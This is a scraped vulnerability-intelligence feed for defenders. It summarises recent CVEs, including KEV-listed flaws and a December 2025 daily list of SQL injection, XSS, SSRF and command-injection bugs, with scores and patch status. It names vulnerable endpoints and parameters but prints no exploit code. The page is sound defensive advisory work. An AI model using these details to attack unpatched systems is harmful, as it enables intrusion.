THREAT ALERT

ACT NOW CVE-2025-48633 5.5 CVE-2025-48633 is a security vulnerability (CVSS 5.5). Risk factors: actively exploited (KEV-listed). Vendor patch is available. | ACT NOW CVE-2025-48572 7.8 Android contains a missing authentication vulnerability (CVE-2025-48572, CVSS 7.8) in multiple locations that allows background activity launches through a permissions bypass, enabling local privilege escalation without user interaction. KEV-listed, this vulnerability enables malicious apps to perform privileged operations silently in the background, bypassing Android's activity launch restrictions. | EMERGENCY CVE-2025-34291 9.4 Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account tak | ACT NOW CVE-2025-66644 7.2 Array Networks ArrayOS AG before 9.4.5.9 contains an OS command injection vulnerability (CVE-2025-66644, CVSS 7.2) that has been actively exploited in the wild from August through December 2025. KEV-listed, this vulnerability in the VPN/SSL-VPN appliance enables authenticated attackers to execute arbitrary commands on the network edge device. | ACT NOW CVE-2025-55182 10.0 React Server Components in React 19.x contain a critical pre-authentication remote code execution vulnerability (CVE-2025-55182, CVSS 10.0) through unsafe deserialization of HTTP request payloads. With EPSS 71.1% and KEV listing, this vulnerability affects any application using React Server Components with react-server-dom-webpack, react-server-dom-turbopack, or react-server-dom-parcel — enabling complete server compromise through a single HTTP request. | EMERGENCY CVE-2025-66301 9.6 Grav is a file-based Web platform. Prior to 1.8.0-beta.27, due to improper authorization checks when modifying critical fields on a POST request to /admin/pages/{page_name}, an editor with only permissions to change basic content on the form is now able to change the functioning of the form through modifying the content of the data[_json][header][form] which is the YAML frontmatter which includes the process section which dictates what happens after a user submits the form which include some important actions that could lead to further vulnerabilities. This vulnerability is fixed in 1.8.0-beta.27. | ACT NOW CVE-2025-66294 8.8 Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27. | ACT NOW CVE-2025-58360 8.2 GeoServer contains an XXE vulnerability in the WMS GetMap operation allowing unauthenticated attackers to read server files and perform SSRF attacks. | ACT NOW CVE-2025-13315 9.3 Twonky Server 8.5.2 on Linux and Windows allows unauthenticated access to the admin log file through a web service API bypass. The exposed log contains the administrator's username and encrypted password, which can be decrypted using hard-coded keys (CVE-2025-13316) to gain full administrative control. | ACT NOW CVE-2025-58034 7.2 Fortinet FortiWeb contains an authenticated OS command injection allowing privilege escalation to execute unauthorized commands on the web application firewall. | ACT NOW CVE-2025-13223 8.8 Google Chrome V8 contains a type confusion vulnerability in the JavaScript engine, the second V8 type confusion zero-day in 2025, exploited in targeted attacks. | ACT NOW CVE-2025-64446 9.8 Fortinet FortiWeb contains a relative path traversal allowing unauthenticated attackers to execute administrative commands through crafted HTTP/HTTPS requests. | ACT NOW CVE-2025-62215 7.0 Windows Kernel contains a race condition vulnerability enabling local privilege escalation through concurrent resource access with improper synchronization. | ACT NOW CVE-2025-60710 7.8 Improper link resolution before file access ('link following') in Host Process for Windows Tasks allows an authorized attacker to elevate privileges locally. Rated high severity (CVSS 7.8), this vulnerability is low attack complexity. No vendor patch available. |

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Get CVEs that hit your stack — not 200/day

Pick your technologies, get a weekly digest by email. Free, no spam.

React Python Postgres +200 more

React Next.js Python Postgres AWS +200 more

Trending Now See all

Critical Watch See all

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Incoming 20

Pre-NVD – not yet scored

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — December 11, 2025

22 CVEs tracked today. 1 Critical, 2 High, 8 Medium, 11 Low.

CVE-2025-67511 CRITICAL CVSS 9.6
A critical command injection vulnerability exists in the Cybersecurity AI (CAI) framework versions 0.5.9 and below, allowing attackers to execute arbitrary commands through unsanitized SSH parameters (username, host, port) in the run_ssh_command_with_credentials() function accessible to AI agents. The vulnerability has a publicly available proof-of-concept exploit and enables remote code execution with potential for complete system compromise, though real-world exploitation probability remains relatively low at 0.12% EPSS score despite the high CVSS rating of 9.6.

RCE Command Injection SSH AI / ML Cybersecurity Ai
CVE-2025-67648 HIGH CVSS 7.1
Shopware, an open commerce platform, contains a reflected cross-site scripting (XSS) vulnerability in its authentication controller where the 'waitTime' URL parameter from the login page is rendered directly into the Twig template without validation or sanitization. Versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0 are affected, allowing attackers to inject malicious JavaScript code through crafted URLs. With an EPSS score of only 0.04% (11th percentile), active exploitation appears low despite the availability of patches and public advisories.

PHP XSS Shopware
CVE-2025-67644 HIGH CVSS 7.3
A SQL injection vulnerability exists in LangGraph SQLite Checkpoint, an implementation of LangGraph CheckpointSaver for SQLite databases. The vulnerability affects versions 3.0.0 and below of the langgraph-checkpoint-sqlite Python package, allowing attackers with local access and low privileges to manipulate SQL queries through unvalidated metadata filter keys in checkpoint search operations. A proof-of-concept exploit is publicly available, though the EPSS score of 0.02% (6th percentile) suggests minimal active exploitation in the wild currently.

SQLi Langgraph Checkpoint Sqlite
CVE-2025-14537 MEDIUM CVSS 5.5
A weakness has been identified in code-projects Class and Exam Timetable Management 1.0. Affected by this issue is some unknown functionality of the file /preview7.php. This manipulation of the argument course_year_section/semester causes sql injection. Remote exploitation of the attack is possible....

PHP SQLi Class And Exam Timetable Management System
CVE-2025-14536 MEDIUM CVSS 5.5
A security flaw has been discovered in code-projects Class and Exam Timetable Management 1.0. Affected by this vulnerability is an unknown functionality of the file /index.php of the component Login. The manipulation of the argument username/password results in sql injection. The attack may be launc...

PHP SQLi Class And Exam Timetable Management System
CVE-2025-14529 MEDIUM CVSS 5.5
A flaw has been found in Campcodes Retro Basketball Shoes Online Store 1.0. The affected element is an unknown function of the file /admin/admin_running.php. This manipulation of the argument pid causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and...

PHP SQLi Retro Basketball Shoes Online Store
CVE-2025-14527 MEDIUM CVSS 5.5
A weakness has been identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /view_book.php. Executing a manipulation of the argument book_id can lead to sql injection. The attack can be executed remotely. The exploit has been made avail...

PHP SQLi Advanced Library Management System
CVE-2025-14515 MEDIUM CVSS 5.5
A vulnerability has been found in Campcodes Supplier Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add_unit.php. Such manipulation of the argument txtunitDetails leads to sql injection. The attack can be launched remotely. The exploit has been d...

PHP SQLi Supplier Management System
CVE-2025-14514 MEDIUM CVSS 5.5
A flaw has been found in Campcodes Supplier Management System 1.0. Affected is an unknown function of the file /admin/add_distributor.php. This manipulation of the argument txtDistributorAddress causes sql injection. The attack can be initiated remotely. The exploit has been published and may be use...

PHP SQLi Supplier Management System
CVE-2025-14512 MEDIUM CVSS 6.5
Integer overflow in GLib's GIO escape_byte_string() function enables heap buffer overflow and denial-of-service when processing malicious filesystem attribute values over the network. The vulnerability affects GLib across GNOME, Red Hat Enterprise Linux 7-10, and OpenShift 4.0+, requiring only unauthenticated network access and user interaction. EPSS score of 0.07% (percentile 22) indicates low exploitation probability despite CVSS 6.5, suggesting the attack requires specific file/attribute handling conditions; no public exploit or active exploitation (CISA KEV) confirmed at analysis time.

Buffer Overflow Integer Overflow
CVE-2025-14293 MEDIUM CVSS 6.5
WP Job Portal plugin for WordPress allows authenticated attackers with Subscriber-level access to read arbitrary files on the server through path traversal in the 'downloadCustomUploadedFile' function, potentially exposing sensitive configuration files, database credentials, or other confidential data. The vulnerability affects all versions up to and including 2.4.0, with CVSS 6.5 reflecting the high confidentiality impact but low attack complexity and requirement only for basic authenticated access.

WordPress Path Traversal
CVE-2025-14538 LOW CVSS 2.0
Reflected cross-site scripting (XSS) in yangshare warehouseManager 仓库管理系统 1.1.0 allows authenticated remote attackers to inject malicious scripts via the Name parameter in the addCustomer function of CustomerManageHandler.java. User interaction is required for exploitation. Public exploit code is available, and the vulnerability has been disclosed publicly.

XSS
CVE-2025-14531 LOW CVSS 2.1
CRLF injection in code-projects Rental Management System 2.0 allows authenticated remote attackers to manipulate log entries via the Log Handler component in Transaction.java, enabling log tampering with minimal real-world impact. The vulnerability requires prior authentication (PR:L), has low integrity impact, and carries a very low EPSS score (0.07%) despite public exploit availability, suggesting exploitation is limited to specific threat scenarios.

Java Code Injection Rental Management System
CVE-2025-14530 LOW CVSS 2.0
Unrestricted file upload in SourceCodester Real Estate Property Listing App 1.0 allows high-privileged authenticated users to upload arbitrary files via the image parameter in /admin/property.php, potentially leading to remote code execution. The vulnerability affects only administrators or high-privilege accounts due to PR:H requirements, but public exploit code exists and EPSS scoring indicates low real-world exploitation probability (0.07th percentile).

PHP Authentication Bypass File Upload Real Estate Property Listing App
CVE-2025-14522 LOW CVSS 2.1
Unrestricted file upload in baowzh hfly allows authenticated remote attackers to upload arbitrary files via manipulation of the imgFile parameter in /Public/Kindeditor/php/upload_json.php. The vulnerability affects rolling-release versions up to commit 638ff9abe9078bc977c132b37acbe1900b63491c, carries low overall risk (CVSS 2.1, EPSS 0.07%), and has publicly available exploit code but requires authenticated access, significantly limiting real-world exploitability compared to unauthenticated file upload scenarios.

PHP Authentication Bypass File Upload Hfly
CVE-2025-14521 LOW CVSS 2.1
Path traversal vulnerability in baowzh hfly allows authenticated remote attackers to read arbitrary files via manipulation of the filename parameter in the /admin/index.php/datafile/download endpoint. The vulnerability affects versions up to commit 638ff9abe9078bc977c132b37acbe1900b63491c, with publicly available exploit code disclosed and no vendor response to early disclosure notification. CVSS score of 2.1 reflects limited confidentiality impact but the low EPSS (0.15%) suggests minimal real-world exploitation despite public disclosure.

PHP Path Traversal Hfly
CVE-2025-14520 LOW CVSS 2.1
Arbitrary file deletion via path traversal in baowzh hfly up to commit 638ff9abe9078bc977c132b37acbe1900b63491c allows authenticated remote attackers to delete files by manipulating the filename parameter in /admin/index.php/datafile/delfile. The vulnerability has public exploit code available but remains low-risk due to authentication requirement and limited scope (information integrity impact only).

PHP Path Traversal Hfly
CVE-2025-14519 LOW CVSS 2.0
Stored cross-site scripting (XSS) in baowzh hfly up to commit 638ff9abe9078bc977c132b37acbe1900b63491c allows authenticated users with user interaction to inject malicious scripts via the /admin/index.php/advtext/add endpoint in the advtext module. Public exploit code is available, and the vulnerability carries a low CVSS score of 2.0 due to authentication and user-interaction requirements, but the EPSS score of 0.05% indicates minimal real-world exploitation probability despite public availability of proof-of-concept code.

PHP XSS Hfly
CVE-2025-14518 LOW CVSS 2.1
Server-side request forgery in PowerJob up to version 5.1.2 allows authenticated remote attackers to manipulate the targetIp and targetPort arguments in the checkConnectivity function of the Network Request Handler component, enabling SSRF attacks with low confidentiality, integrity, and availability impact. Publicly available exploit code exists; however, the EPSS score of 0.03% indicates minimal real-world exploitation probability despite the public exploit availability, suggesting this vulnerability has seen limited active abuse.

Java SSRF Powerjob
CVE-2025-14517 LOW CVSS 1.9
Yalantis uCrop 2.2.11 contains an improperly exported Android application component (UCropActivity) in AndroidManifest.xml that allows local attackers with application-level privileges to access the component via intent manipulation, potentially disclosing sensitive information. The vulnerability requires local access and user application permissions but affects confidentiality with low impact. Public exploit code is available, though the EPSS score of 0.06% suggests limited real-world exploitation despite public disclosure.

Information Disclosure Google Ucrop
CVE-2025-14516 LOW CVSS 2.1
Server-side request forgery in Yalantis uCrop 2.2.11 allows authenticated remote attackers to manipulate the downloadFile function in BitmapLoadTask.java URL handler, enabling arbitrary HTTP requests from the affected server. The vulnerability requires user authentication (PR:L) and carries limited confidentiality and integrity impact. Public exploit code exists, though the vendor has not responded to early disclosure attempts.

Java SSRF Ucrop
CVE-2025-14485 LOW CVSS 1.3
Command injection in EFM ipTIME A3004T firmware version 14.19.0 allows authenticated remote attackers to execute arbitrary commands via malformed input to the aaksjdkfj parameter in the show_debug_screen function of /sess-bin/timepro.cgi. Public exploit code is available, but the vulnerability has a high attack complexity requirement and the vendor has not issued a patch despite early disclosure notification.

Command Injection

Track CVEs for your stack Sign up free →

Today's Vulnerabilities Vulnerabilities